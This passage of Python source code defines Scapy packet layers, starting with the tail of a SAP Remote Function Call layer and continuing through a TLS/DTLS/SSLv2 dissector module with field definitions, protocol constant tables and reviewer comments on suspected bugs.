        ConditionalField(PacketField("sap_cpic", None, SAPCPIC),lambda pkt: pkt.version == 0x6 and 'F_V_SEND_DATA' in str(pkt.vector) and not pkt.codepage_size2), # chipik
        # Fallback used only when sap_cpic above came out empty.
        ConditionalField(PacketField("sap_cpic_cut", None, SAPCPIC2),lambda pkt: pkt.version == 0x6 and 'F_V_SEND_DATA' in str(pkt.vector) and not pkt.codepage_size2 and not pkt.sap_cpic), # chipik
        # answer from Anon GW
        # This condition compares with == while the others use substring "in":
        # it only holds when F_V_RECEIVE is the sole flag in the string form.
        ConditionalField(StrFixedLenField("anon_repl_sign",'\x05\x00\x00\x00', 4),lambda pkt: pkt.version == 0x6 and 'F_V_RECEIVE' == str(pkt.vector)),
        # The list length is taken from the codepage_size2 value in the packet.
        ConditionalField(PacketListField("repl", None, DEF_FIELDS, length_from=lambda pkt: pkt.codepage_size2),lambda pkt: pkt.version == 0x6 and 'F_V_RECEIVE' in str(pkt.vector) and pkt.codepage_size2>0),
        ConditionalField(ShortField("cpic_packet_size", 0x0),lambda pkt: pkt.version == 0x6 and 'F_V_SEND_DATA' in str(pkt.vector)), # chipik
        ConditionalField(IntField("rfc_packet_size", 0x0),lambda pkt: pkt.version == 0x6 and 'F_V_SEND_DATA' in str(pkt.vector)), # chipik
    ]
    name = "SAP Remote Function Call"
# Bind SAP NI with the RFC port...
ssl_tls.py
Source:ssl_tls.py
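#! /usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : tintinweb@oststrom.com <github.com/tintinweb>
# http://www.secdev.org/projects/scapy/doc/build_dissect.html
import os
import struct  # imported explicitly instead of relying on the scapy.fields star import
import time

from scapy.packet import Packet, bind_layers
from scapy.fields import *
from scapy.layers.inet import TCP, UDP


class BLenField(LenField):
    """Length field that can be narrower than its struct format.

    ``numbytes`` keeps only the last ``numbytes`` bytes of the packed value,
    which is how 3-byte (24-bit) lengths are expressed with ``fmt="!I"``.
    ``adjust_i2m`` / ``adjust_m2i`` are hooks applied to the value on its way
    to and from the wire. ``length_of`` / ``count_of`` name the field whose
    length or element count is written when the value is left as None.
    """

    def __init__(self, name, default, fmt="I", adjust_i2m=lambda pkt, x:x, numbytes=None, length_of=None, count_of=None, adjust_m2i=lambda pkt, x:x):
        self.name = name
        self.adjust_i2m = adjust_i2m
        self.adjust_m2i = adjust_m2i
        self.numbytes = numbytes
        self.length_of = length_of
        self.count_of = count_of
        LenField.__init__(self, name, default, fmt)
        # Default to network byte order when no order/alignment prefix is given.
        self.fmt = fmt if fmt[0] in "@=<>!" else "!" + fmt
        self.default = self.any2i(None, default)
        self.sz = numbytes if numbytes else struct.calcsize(self.fmt)
        self.owners = []

    def addfield(self, pkt, s, val):
        """Append the packed value to ``s``, truncated to ``numbytes`` if set."""
        packed = struct.pack(self.fmt, self.i2m(pkt, val))
        if self.numbytes:
            # Keep the trailing bytes: the low-order part for big-endian formats.
            packed = packed[len(packed) - self.numbytes:]
        return s + packed

    def getfield(self, pkt, s):
        """Read ``sz`` bytes from ``s``; return (remaining bytes, value).

        The bytes are left-padded with zeros up to the size of ``fmt`` so that
        struct.unpack accepts them; this only preserves the value for
        big-endian formats. If fewer than ``sz`` bytes are left in ``s``,
        struct.unpack raises struct.error.
        """
        width = struct.calcsize(self.fmt)
        # b'\x00' instead of '\x00' so the padding also concatenates with bytes
        # input; on Python 2 both literals are the same type.
        raw = b'\x00' * (width - self.sz) + s[:self.sz]
        return s[self.sz:], self.m2i(pkt, struct.unpack(self.fmt, raw)[0])

    def i2m(self, pkt, x):
        """Return the wire value; compute it when ``x`` is None."""
        if x is not None:
            return x
        if not (self.length_of or self.count_of):
            # No referenced field: use the length of the payload.
            return self.adjust_i2m(pkt, len(pkt.payload))
        if self.length_of is not None:
            fld, fval = pkt.getfield_and_val(self.length_of)
            measured = fld.i2len(pkt, fval)
        else:
            fld, fval = pkt.getfield_and_val(self.count_of)
            measured = fld.i2count(pkt, fval)
        return self.adjust_i2m(pkt, measured)

    def m2i(self, pkt, x):
        """Apply the ``adjust_m2i`` hook to a value read from the wire."""
        return self.adjust_m2i(pkt, x)


class XBLenField(BLenField):
    """BLenField displayed in hexadecimal."""

    def i2repr(self, pkt, x):
        return lhex(self.i2h(pkt, x))


class XLenField(LenField):
    """LenField displayed in hexadecimal."""

    def i2repr(self, pkt, x):
        return lhex(self.i2h(pkt, x))


class XFieldLenField(FieldLenField):
    """FieldLenField displayed in hexadecimal."""

    def i2repr(self, pkt, x):
        return lhex(self.i2h(pkt, x))


class BEnumField(EnumField):
    """Enum field that can be narrower than its struct format (see BLenField)."""

    def __init__(self, name, default, enum, fmt="!I", numbytes=None):
        EnumField.__init__(self, name, default, enum, fmt)
        self.numbytes = numbytes

        self.name = name
        self.fmt = fmt if fmt[0] in "@=<>!" else "!" + fmt
        self.default = self.any2i(None, default)
        self.sz = numbytes if numbytes else struct.calcsize(self.fmt)
        self.owners = []

    def addfield(self, pkt, s, val):
        """Append the packed value to ``s``, truncated to ``numbytes`` if set."""
        packed = struct.pack(self.fmt, self.i2m(pkt, val))
        if self.numbytes:
            packed = packed[len(packed) - self.numbytes:]
        return s + packed

    def getfield(self, pkt, s):
        """Read ``sz`` bytes from ``s``; return (remaining bytes, value).

        Zero-pads on the left to the size of ``fmt`` (big-endian assumption);
        raises struct.error when fewer than ``sz`` bytes are available.
        """
        width = struct.calcsize(self.fmt)
        raw = b'\x00' * (width - self.sz) + s[:self.sz]
        return s[self.sz:], self.m2i(pkt, struct.unpack(self.fmt, raw)[0])

    def i2repr_one(self, pkt, x):
        """Return the enum name for ``x`` when known, else its hex form."""
        if self not in conf.noenum and not isinstance(x, VolatileValue) and x in self.i2s:
            return self.i2s[x]
        return lhex(x)


class XBEnumField(BEnumField):
    """BEnumField displayed in hexadecimal."""

    def i2repr(self, pkt, x):
        return lhex(self.i2h(pkt, x))


# NOTE(review): 0xfefd is the version number of DTLS 1.2 (RFC 6347); the
# "DTLS_1_1" label is kept unchanged because callers may match on the string.
TLS_VERSIONS = {
    0x0002: "SSL_2_0",
    0x0300: "SSL_3_0",
    0x0301: "TLS_1_0",
    0x0302: "TLS_1_1",
    0x0303: "TLS_1_2",

    0x0100: "PROTOCOL_DTLS_1_0_OPENSSL_PRE_0_9_8f",
    0xfeff: "DTLS_1_0",
    0xfefd: "DTLS_1_1",
}

TLS_CONTENT_TYPES = {
    0x14: "change_cipher_spec",
    0x15: "alert",
    0x16: "handshake",
    0x17: "application_data",
    0x18: "heartbeat",
    0xff: "unknown",
}

# The last three message types were keyed 0x20/0x21/0x22; their assigned
# numbers are decimal 20, 21 and 22 (RFC 5246, RFC 6066), i.e. 0x14-0x16.
TLS_HANDSHAKE_TYPES = {
    0x00: "hello_request",
    0x01: "client_hello",
    0x02: "server_hello",
    0x0b: "certificate",
    0x0c: "server_key_exchange",
    0x0d: "certificate_request",
    0x0e: "server_hello_done",
    0x0f: "certificate_verify",
    0x10: "client_key_exchange",
    0x14: "finished",
    0x15: "certificate_url",
    0x16: "certificate_stats",
    0xff: "unknown",
}

TLS_EXTENSION_TYPES = {
    0x0000: "server_name",
    0x0001: "max_fragment_length",
    0x0002: "client_certificate_url",
    0x0003: "trusted_ca_keys",
    0x0004: "truncated_hmac",
    0x0005: "status_request",
    0x000a: "elliptic_curves",
    0x000b: "ec_point_formats",
    0x000d: "signature_algorithms",
    0x000f: "heartbeat",
    0x0023: "session_ticket_tls",
    0x3374: "next_protocol_negotiation",
    0xff01: "renegotiationg_info",
}

TLS_ALERT_LEVELS = {
    0x01: "warning",
    0x02: "fatal",
    0xff: "unknown",
}

# BAD_CERTIFICATE was keyed 43, the same key as UNSUPPORTED_CERTIFICATE, so the
# later entry silently replaced it; its assigned code is 42 (RFC 5246).
# The misspelled labels are kept because callers may match on them.
TLS_ALERT_DESCRIPTIONS = {
    0: "CLOSE_NOTIFY",
    10: "UNEXPECTE_MESSAGE",
    20: "BAD_RECORD_MAC",
    21: "DESCRIPTION_FAILED_RESERVED",
    22: "RECORD_OVERFLOW",
    30: "DECOMPRESSION_FAILURE",
    40: "HANDSHAKE_FAILURE",
    41: "NO_CERTIFICATE_RESERVED",
    42: "BAD_CERTIFICATE",
    43: "UNSUPPORTED_CERTIFICATE",
    44: "CERTIFICATE_REVOKED",
    45: "CERTIFICATE_EXPIRED",
    46: "CERTIFICATE_UNKNOWN",
    47: "ILLEGAL_PARAMETER",
    48: "UNKNOWN_CA",
    49: "ACCESS_DENIED",
    50: "DECODE_ERROR",
    51: "DECRYPT_ERROR",
    60: "EXPORT_RESTRICTION_RESERVED",
    70: "PROTOCOL_VERSION",
    71: "INSUFFICIENT_SECURITY",
    86: "INAPPROPRIATE_FALLBACK",
    80: "INTERNAL_ERROR",
    90: "USER_CANCELED",
    100: "NO_RENEGOTIATION",
    110: "UNSUPPORTED_EXTENSION",
    111: "CERTIFICATE_UNOBTAINABLE",
    112: "UNRECOGNIZED_NAME",
    113: "BAD_CERTIFICATE_STATUS_RESPNSE",
    114: "BAD_CERTIFICATE_HASH_VALUE",
    255: "UNKNOWN_255",
}

TLS_EXT_MAX_FRAGMENT_LENGTH_ENUM = {
    0x01: 2 ** 9,
    0x02: 2 ** 10,
    0x03: 2 ** 11,
    0x04: 2 ** 12,
    0xff: 'unknown',
}


class TLSCipherSuite:
    """Cipher suite numbers exposed as class attributes (for autocompletion).

    Every attribute whose name does not start with "__" ends up in
    TLS_CIPHER_SUITES below, so only suite constants belong here.
    The list includes NULL, EXPORT, DES and RC4 suites.
    """
    NULL_WITH_NULL_NULL = 0x0000
    RSA_WITH_NULL_MD5 = 0x0001
    RSA_WITH_NULL_SHA1 = 0x0002
    RSA_WITH_NULL_SHA256 = 0x003b
    RSA_WITH_3DES_EDE_CBC_SHA = 0x000a  # was listed twice with the same value
    DHE_RSA_WITH_3DES_EDE_CBC_SHA = 0x0016
    DHE_DSS_WITH_3DES_EDE_CBC_SHA = 0x0013
    DHE_RSA_WITH_AES_128_CBC_SHA = 0x0033
    DHE_DSS_WITH_AES_128_CBC_SHA = 0x0032
    RSA_WITH_AES_128_CBC_SHA = 0x002f
    RSA_WITH_IDEA_CBC_SHA = 0x0007
    DHE_DSS_WITH_RC4_128_SHA = 0x0066
    RSA_WITH_RC4_128_SHA = 0x0005
    RSA_WITH_RC4_128_MD5 = 0x0004
    DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA = 0x0063
    RSA_EXPORT1024_WITH_DES_CBC_SHA = 0x0062
    RSA_EXPORT1024_WITH_RC2_CBC_56_MD5 = 0x0061
    DHE_RSA_WITH_DES_CBC_SHA = 0x0015
    DHE_DSS_WITH_DES_CBC_SHA = 0x0012
    RSA_WITH_DES_CBC_SHA = 0x0009
    DHE_DSS_EXPORT1024_WITH_RC4_56_SHA = 0x0065
    RSA_EXPORT1024_WITH_RC4_56_SHA = 0x0064
    RSA_EXPORT1024_WITH_RC4_56_MD5 = 0x0060
    DHE_RSA_EXPORT_WITH_DES40_CBC_SHA = 0x0014
    DHE_DSS_EXPORT_WITH_DES40_CBC_SHA = 0x0011
    RSA_EXPORT_WITH_DES40_CBC_SHA = 0x0008
    RSA_EXPORT_WITH_RC2_CBC_40_MD5 = 0x0006
    RSA_EXPORT_WITH_RC4_40_MD5 = 0x0003
    RSA_WITH_AES_256_CBC_SHA = 0x0035
    DHE_DSS_WITH_AES_256_CBC_SHA = 0x0038
    DHE_RSA_WITH_AES_256_CBC_SHA = 0x0039
    ECDHE_ECDSA_WITH_AES_256_CBC_SHA = 0xc00a
    ECDH_RSA_WITH_AES_256_CBC_SHA = 0xc00f
    ECDHE_RSA_WITH_AES_256_CBC_SHA = 0xc014
    SRP_SHA_RSA_WITH_AES_256_CBC_SHA = 0xc021
    SRP_SHA_DSS_WITH_AES_256_CBC_SHA = 0xc022
    DHE_DSS_WITH_CAMELLIA_256_CBC_SHA = 0x0087
    DHE_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0088
    ECDH_ECDSA_WITH_AES_256_CBC_SHA = 0xc005
    RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0084
    TLS_FALLBACK_SCSV = 0x5600


# Reverse map: suite number -> attribute name.
TLS_CIPHER_SUITES = dict((v, k) for k, v in TLSCipherSuite.__dict__.items() if not k.startswith("__"))


class TLSCompressionMethod:
    """Compression method numbers exposed as class attributes (for autocompletion)."""
    NULL = 0x00
    DEFLATE = 0x01


# Reverse map: method number -> attribute name.
TLS_COMPRESSION_METHODS = dict((v, k) for k, v in TLSCompressionMethod.__dict__.items() if not k.startswith("__"))


class TLSRecord(Packet):
    """Record header: content type, version and 16-bit length."""
    name = "TLS Record"
    fields_desc = [
        ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
        XShortEnumField("version", 0x0301, TLS_VERSIONS),
        XLenField("length", None, fmt="!H"),
    ]


class TLSCiphertext(Packet):
    """Same three header fields as TLSRecord, under a different layer name."""
    name = "TLS Ciphertext Fragment"
    fields_desc = [
        ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
        XShortEnumField("version", 0x0301, TLS_VERSIONS),
        XLenField("length", None, fmt="!H"),
    ]


class TLSCiphertextDecrypted(Packet):
    """Single unbounded string field ``data``."""
    name = "TLS Ciphertext Decrypted"
    fields_desc = [StrField("data", None, fmt="H")]


class TLSCiphertextMAC(Packet):
    """Single unbounded string field ``mac``."""
    name = "TLS Ciphertext MAC"
    fields_desc = [StrField("mac", None, fmt="H")]


class TLSCompressed(Packet):
    """Same three header fields as TLSRecord, under a different layer name."""
    name = "TLS Compressed Fragment"
    fields_desc = [
        ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
        XShortEnumField("version", 0x0301, TLS_VERSIONS),
        XLenField("length", None, fmt="!H"),
    ]


class TLSPlaintext(Packet):
    """Same three header fields as TLSRecord, under a different layer name."""
    name = "TLS Plaintext"
    fields_desc = [
        ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
        XShortEnumField("version", 0x0301, TLS_VERSIONS),
        XLenField("length", None, fmt="!H"),
    ]


class TLSHandshake(Packet):
    """Handshake header: one-byte message type and 3-byte length."""
    name = "TLS Handshake"
    fields_desc = [
        ByteEnumField("type", 0xff, TLS_HANDSHAKE_TYPES),
        XBLenField("length", None, fmt="!I", numbytes=3),
    ]


class TLSServerName(Packet):
    """One server_name entry: name type, 16-bit length, name bytes."""
    name = "TLS Servername"
    fields_desc = [
        ByteEnumField("type", 0x00, {0x00:"host"}),
        XFieldLenField("length", None, length_of="data", fmt="H"),
        StrLenField("data", "", length_from=lambda x:x.length),
    ]


class TLSServerNameIndication(Packet):
    """SNI extension body: 16-bit list length followed by TLSServerName entries."""
    name = "TLS Extension Servername Indication"
    fields_desc = [
        XFieldLenField("length", None, length_of="server_names", fmt="H"),
        PacketListField("server_names", None, TLSServerName, length_from=lambda x:x.length),
    ]


class TLSExtension(Packet):
    """Extension header: 16-bit type and 16-bit length of the extension body."""
    name = "TLS Extension"
    fields_desc = [
        XShortEnumField("type", 0x0000, TLS_EXTENSION_TYPES),
        XLenField("length", None, fmt="!H"),
    ]

    def extract_padding(self, s):
        # The first `length` bytes are this extension's body; the rest is
        # handed back. `length` is the value read from the packet.
        return s[:self.length],s[self.length:]
#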
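# https://www.ietf.org/rfc/rfc3546.txt
class TLSExtMaxFragmentLength(Packet):
    """max_fragment_length extension body: a single enum byte."""
    name = "TLS Extension Max Fragment Length"
    fields_desc = [ByteEnumField("max_fragment_length", 0xff, TLS_EXT_MAX_FRAGMENT_LENGTH_ENUM)]

    def extract_padding(self, s):
        # No payload: everything after the field is returned as padding.
        return '', s


CERT_CHAIN_TYPE = {
    0x00: 'individual_certs',
    0x01: 'pkipath',
    0xff: 'unknown',
}
TLS_TYPE_BOOLEAN = {
    0x00: 'false',
    0x01: 'true',
}


class TLSURLAndOptionalHash(Packet):
    """URL with 16-bit length, a presence flag, and an optional 20-byte SHA-1 hash."""
    name = "TLS Extension Certificate URL/Hash"
    fields_desc = [
        XFieldLenField("url_length", None, length_of="url", fmt="H"),
        StrLenField("url", "", length_from=lambda x:x.url_length),
        ByteEnumField("hash_present", 0x00, TLS_TYPE_BOOLEAN),
        # opaque SHA1Hash[20]; read only when hash_present is non-zero
        StrLenField("sha1hash", "", length_from=lambda x:20 if x.hash_present else 0),
    ]


class TLSExtCertificateURL(Packet):
    """client_certificate_url body: chain type, 16-bit length, URL/hash entries."""
    name = "TLS Extension Certificate URL"
    fields_desc = [
        ByteEnumField("type", 0xff, CERT_CHAIN_TYPE),
        XFieldLenField("length", None, length_of="certificate_urls", fmt="H"),
        PacketListField("certificate_urls", None, TLSURLAndOptionalHash, length_from=lambda x:x.length),
    ]

    def extract_padding(self, s):
        return '', s


TLS_EXT_EC_POINT_FORMATS = {
    0x00: 'uncompressed',
    0x01: 'ansiX962_compressed_prime',
    0x02: 'ansiX962_compressed_char2',
}


class TLSExtECPointsFormat(Packet):
    """ec_point_formats body: one-byte length and a list of one-byte formats."""
    name = "TLS Extension EC Points Format"
    fields_desc = [
        XFieldLenField("length", None, length_of="ec_point_formats", fmt="B"),
        FieldListField("ec_point_formats", None, ByteEnumField("ec_point_format", None, TLS_EXT_EC_POINT_FORMATS), length_from=lambda x:x.length),
    ]

    def extract_padding(self, s):
        return '', s


TLS_EXT_ELLIPTIC_CURVES = {
    0x000e: 'sect571r1',
}


class TLSExtEllipticCurves(Packet):
    """elliptic_curves body: 16-bit length and a list of 16-bit curve ids."""
    name = "TLS Extension Elliptic Curves"
    fields_desc = [
        XFieldLenField("length", None, length_of="elliptic_curves", fmt="H"),
        FieldListField("elliptic_curves", None, ShortEnumField("elliptic_curve", None, TLS_EXT_ELLIPTIC_CURVES), length_from=lambda x:x.length),
    ]

    def extract_padding(self, s):
        return '', s


class TLSExtHeartbeat(Packet):
    """heartbeat extension body: one byte ``mode``."""
    name = "TLS Extension HeartBeat"
    # NOTE(review): the default of this one-byte string field is the int 0x01.
    fields_desc = [StrFixedLenField("mode", 0x01, 0x01)]

    def extract_padding(self, s):
        return '', s


class TLSClientHello(Packet):
    """ClientHello body.

    The defaults for ``gmt_unix_time`` and ``random_bytes`` are computed once,
    when this class body is executed, so every packet built with the defaults
    in the same process carries the same timestamp and the same 28 random
    bytes. Pass both explicitly when each hello needs fresh values.
    """
    name = "TLS Client Hello"
    fields_desc = [
        XShortEnumField("version", 0x0301, TLS_VERSIONS),
        IntField("gmt_unix_time", int(time.time())),
        StrFixedLenField("random_bytes", os.urandom(28), 28),
        XFieldLenField("session_id_length", None, length_of="session_id", fmt="B"),
        StrLenField("session_id", '', length_from=lambda x:x.session_id_length),

        XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),
        FieldListField("cipher_suites", None, XShortEnumField("cipher", None, TLS_CIPHER_SUITES), length_from=lambda x:x.cipher_suites_length),

        XFieldLenField("compression_methods_length", None, length_of="compression_methods", fmt="B"),
        FieldListField("compression_methods", None, ByteEnumField("compression", None, TLS_COMPRESSION_METHODS), length_from=lambda x:x.compression_methods_length),

        XFieldLenField("extensions_length", None, length_of="extensions", fmt="H"),
        PacketListField("extensions", None, TLSExtension, length_from=lambda x:x.extensions_length),
    ]


class TLSServerHello(Packet):
    """ServerHello body.

    As in TLSClientHello, the ``gmt_unix_time`` and ``random_bytes`` defaults
    are fixed when the class body runs, not per packet.
    """
    name = "TLS Server Hello"
    fields_desc = [
        XShortEnumField("version", 0x0301, TLS_VERSIONS),
        IntField("gmt_unix_time", int(time.time())),
        StrFixedLenField("random_bytes", os.urandom(28), 28),
        XFieldLenField("session_id_length", None, length_of="session_id", fmt="B"),
        StrLenField("session_id", '', length_from=lambda x:x.session_id_length),
        XShortEnumField("cipher_suite", 0x0000, TLS_CIPHER_SUITES),
        ByteEnumField("compression_method", 0x00, TLS_COMPRESSION_METHODS),
        XFieldLenField("extensions_length", None, length_of="extensions", fmt="H"),
        PacketListField("extensions", None, TLSExtension, length_from=lambda x:x.extensions_length),
    ]


class TLSAlert(Packet):
    """Alert message: level byte and description byte."""
    name = "TLS Alert"
    fields_desc = [
        ByteEnumField("level", 0xff, TLS_ALERT_LEVELS),
        ByteEnumField("description", 0xff, TLS_ALERT_DESCRIPTIONS),
    ]


class TLSHeartBeat(Packet):
    """Heartbeat message: type, 16-bit payload length, payload, padding.

    ``data`` is sliced to at most ``length`` bytes, so a message whose declared
    length is larger than the bytes actually present dissects without error;
    code that inspects heartbeats has to compare ``len(data)`` with ``length``
    itself.
    """
    name = "TLS Extension HeartBeat"
    fields_desc = [
        ByteEnumField("type", 0x01, {0x01:"request"}),
        FieldLenField("length", None, length_of="data", fmt="H"),
        StrLenField("data", "", length_from=lambda x:x.length),
        # length_from must return a byte count. The original returned the
        # string 'P' * (16 - x.length), which cannot be used as a slice bound
        # and made dissection fail. The count 16 - length is kept from that
        # expression and clamped at zero.
        # NOTE(review): RFC 6520 requires at least 16 bytes of padding
        # whatever the payload length -- confirm the intended layout.
        StrLenField("padding", "", length_from=lambda x: max(0, 16 - x.length)),
    ]


class TLSClientKeyExchange(Packet):
    """ClientKeyExchange header: 16-bit length."""
    name = "TLS Client Key Exchange"
    fields_desc = [XBLenField("length", None, fmt="!H",)]


class TLSServerKeyExchange(Packet):
    """ServerKeyExchange header: 16-bit length."""
    # The layer name was a copy of the client class ("TLS Client Key Exchange").
    name = "TLS Server Key Exchange"
    fields_desc = [XBLenField("length", None, fmt="!H")]


class TLSKexParamEncryptedPremasterSecret(Packet):
    """Opaque key-exchange parameter bytes."""
    name = "TLS Kex encrypted PreMasterSecret"
    fields_desc = [
        # FieldLenField("length",None,length_of="data",fmt="H"),
        StrLenField("data", None),
    ]


class TLSKexParamDH(Packet):
    """Opaque Diffie-Hellman key-exchange parameter bytes."""
    name = "TLS Kex DH Params"
    fields_desc = [
        # FieldLenField("length",None,length_of="data",fmt="H"),
        StrLenField("data", None),
    ]


class TLSFinished(Packet):
    """Finished message body."""
    name = "TLS Handshake Finished"
    fields_desc = [
        # FieldLenField("length",None,length_of="data",fmt="H"),
        StrLenField("data", None),
    ]

    def xbuild(self, master_secret, finished_label, hash_handshake_messages):
        """Set ``data`` to prf(master_secret, finished_label, hash_handshake_messages).

        finished_label is one of 'client finished' / 'server finished'.

        NOTE(review): ``ssl_tls_crypto`` is not among the imports at the top of
        this file; unless it is imported further down, this call raises
        NameError -- confirm.
        """
        self.data = ssl_tls_crypto.prf(master_secret, finished_label, hash_handshake_messages)


class TLSDHServerParams(Packet):
    """Server DH parameters: p, g, public key and signature, each with a 16-bit length."""
    name = "TLS Diffie-Hellman Server Params"
    fields_desc = [
        XFieldLenField("p_length", None, length_of="p", fmt="!H"),
        StrLenField("p", '', length_from=lambda x:x.p_length),
        XFieldLenField("g_length", None, length_of="g", fmt="!H"),
        StrLenField("g", '', length_from=lambda x:x.g_length),
        XFieldLenField("pubkey_length", None, length_of="pubkey", fmt="!H"),
        StrLenField("pubkey", '', length_from=lambda x:x.pubkey_length),
        XFieldLenField("signature_length", None, length_of="signature", fmt="!H"),
        StrLenField("signature", '', length_from=lambda x:x.signature_length),
    ]


class TLSServerHelloDone(Packet):
    """ServerHelloDone: 3-byte length and that many data bytes."""
    name = "TLS Server Hello Done"
    fields_desc = [
        XBLenField("length", None, fmt="!I", numbytes=3),
        StrLenField("data", "", length_from=lambda x:x.length),
    ]


class TLSCertificate(Packet):
    """One certificate: 3-byte length and the certificate bytes."""
    name = "TLS Certificate"
    fields_desc = [
        XBLenField("length", None, length_of="data", fmt="!I", numbytes=3),
        StrLenField("data", "", length_from=lambda x:x.length),  # BERcodec_Object.dec(data,context=ASN1_Class_X509)
    ]

    def extract_padding(self,s):
        # NOTE(review): the tuple order is the reverse of
        # TLSExtension.extract_padding, which returns
        # (s[:length], s[length:]) -- confirm that this split is intended.
        return s[self.length:],s[:self.length]


class TLSCertificateList(Packet):
    """Certificate chain: 3-byte total length and a list of TLSCertificate."""
    name = "TLS Certificate List"
    fields_desc = [
        XBLenField("length", None, length_of="certificates", fmt="!I", numbytes=3),
        PacketListField("certificates", None, TLSCertificate, length_from=lambda x:x.length),
    ]

    def extract_padding(self,s):
        # NOTE(review): same reversed split as TLSCertificate -- confirm.
        return s[self.length:],s[:self.length]


class TLSChangeCipherSpec(Packet):
    """ChangeCipherSpec message; the default body is the single byte 0x01."""
    name = "TLS ChangeCipherSpec"
    fields_desc = [StrField("message", '\x01', fmt="H")]


class xTLSCiphertext(Packet):
    """Placeholder ciphertext layer: ``data`` and ``mac`` strings."""
    name = "TLS Ciphertext"
    fields_desc = [
        StrField("data", None, fmt="H"),
        StrField("mac", None, fmt="H"),
    ]

    def encrypt(self, record):
        """Store ``str(record)`` in ``data`` and return self.

        No MAC is computed and nothing is encrypted; the steps are only
        listed as comments.
        """
        # t = record[TLSRecord]

        # compute MAC
        # encrypt DATA+MAC
        self.data = str(record)
        return self

    def decrypt(self):
        """Return a new, empty TLSRecord; nothing is decrypted."""
        return TLSRecord()


class xTLSPlaintext(Packet):
    """Plaintext layer with a ``compress`` helper keyed by compression method."""
    name = "TLS Plaintext"
    fields_desc = [StrField("data", None, fmt="H")]
    # str.encode('zlib') / str.decode('zlib') exist only on Python 2.
    ptr_methods = {
        'default': {'encode': lambda x:x,  # NULL
                    'decode': lambda x:x},
        TLSCompressionMethod.DEFLATE: {'encode': lambda x:x.encode('zlib'),
                                       'decode': lambda x:x.decode('zlib')},
    }

    def compress(self, method, data=None):
        """Encode ``data`` (or ``self.data``) with ``method``; wrap it in TLSCompressed.

        Unknown methods fall back to the 'default' (identity) codec.
        """
        self.method = method
        data = data or self.data
        codec = self.ptr_methods.get(self.method, self.ptr_methods['default'])
        return TLSCompressed(codec['encode'](data))


class xTLSCompressed(Packet):
    """Compressed layer with a ``decompress`` helper keyed by compression method."""
    name = "TLS Compressed"
    fields_desc = [StrField("data", None, fmt="H")]

    # str.encode('zlib') / str.decode('zlib') exist only on Python 2.
    ptr_methods = {
        'default': {'encode': lambda x:x,
                    'decode': lambda x:x},
        TLSCompressionMethod.DEFLATE: {'encode': lambda x:x.encode('zlib'),
                                       'decode': lambda x:x.decode('zlib')},
    }

    def decompress(self, method, data=None):
        """Decode ``data`` (or ``self.data``) with ``method``; parse it as TLSRecord.

        The DEFLATE codec inflates the whole input in memory with no limit on
        the output size; when the input comes from the network, bound the
        compressed size before calling this.
        """
        self.method = method
        data = data or self.data

        codec = self.ptr_methods.get(self.method, self.ptr_methods['default'])
        return TLSRecord(codec['decode'](data))


class DTLSRecord(Packet):
    """DTLS record header: type, version, epoch, 6-byte sequence, 16-bit length."""
    name = "DTLS Record"
    fields_desc = [
        ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
        XShortEnumField("version", 0x0301, TLS_VERSIONS),
        ShortField("epoch", None),
        XBLenField("sequence", None, fmt="!Q", numbytes=6),
        XLenField("length", None, fmt="!H"),
    ]


class DTLSHandshake(Packet):
    """TLSHandshake fields followed by sequence, fragment offset and length.

    NOTE(review): TLSHandshake.fields_desc already has a field named "length",
    so the list ends up with two fields of that name -- confirm which one
    ``pkt.length`` refers to.
    """
    name = "DTLS Handshake"
    fields_desc = TLSHandshake.fields_desc + [
        ShortField("sequence", None),
        XBLenField("fragment_offset", None, fmt="!I", numbytes=3),
        XBLenField("length", None, fmt="!I", numbytes=3),
    ]


class DTLSClientHello(Packet):
    """DTLS ClientHello body (TLS ClientHello plus a cookie).

    The ``gmt_unix_time`` and ``random_bytes`` defaults are fixed when the
    class body runs, not per packet.
    """
    name = "DTLS Client Hello"
    fields_desc = [
        XShortEnumField("version", 0xfeff, TLS_VERSIONS),
        IntField("gmt_unix_time", int(time.time())),
        StrFixedLenField("random_bytes", os.urandom(28), 28),
        XFieldLenField("session_id_length", None, length_of="session_id", fmt="B"),
        StrLenField("session_id", '', length_from=lambda x:x.session_id_length),

        XFieldLenField("cookie_length", None, length_of="cookie", fmt="B"),
        StrLenField("cookie", '', length_from=lambda x:x.cookie_length),

        XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),
        FieldListField("cipher_suites", None, XShortEnumField("cipher", None, TLS_CIPHER_SUITES), length_from=lambda x:x.cipher_suites_length),

        XFieldLenField("compression_methods_length", None, length_of="compression_methods", fmt="B"),
        FieldListField("compression_methods", None, ByteEnumField("compression", None, TLS_COMPRESSION_METHODS), length_from=lambda x:x.compression_methods_length),

        XFieldLenField("extensions_length", None, length_of="extensions", fmt="H"),
        # The original read x.extension_length, a field this class does not
        # define; the length field above is named extensions_length.
        PacketListField("extensions", None, TLSExtension, length_from=lambda x:x.extensions_length),
    ]


SSLv2_CERTIFICATE_TYPES = {0x01: 'x.509'}


class DTLSHelloVerify(Packet):
    """HelloVerifyRequest body: version and a cookie with one-byte length."""
    name = "DTLS Hello Verify"
    fields_desc = [
        XShortEnumField("version", 0xfeff, TLS_VERSIONS),
        XFieldLenField("cookie_length", None, length_of="cookie", fmt="B"),
        StrLenField("cookie", '', length_from=lambda x:x.cookie_length),
    ]


SSLv2_MESSAGE_TYPES = {
    0x01: 'client_hello',
    0x04: 'server_hello',
    0x02: 'client_master_key',
}


class SSLv2CipherSuite:
    """SSLv2 cipher kinds exposed as class attributes (for autocompletion).

    Every attribute whose name does not start with "__" ends up in
    SSL2_CIPHER_SUITES below.
    """
    DES_192_EDE3_CBC_WITH_MD5 = 0x0700c0
    IDEA_128_CBC_WITH_MD5 = 0x050080
    RC2_CBC_128_CBC_WITH_MD5 = 0x030080
    RC4_128_WITH_MD5 = 0x010080
    RC4_64_WITH_MD5 = 0x080080
    DES_64_CBC_WITH_MD5 = 0x060040
    RC2_128_CBC_EXPORT40_WITH_MD5 = 0x040080
    RC4_128_EXPORT40_WITH_MD5 = 0x020080


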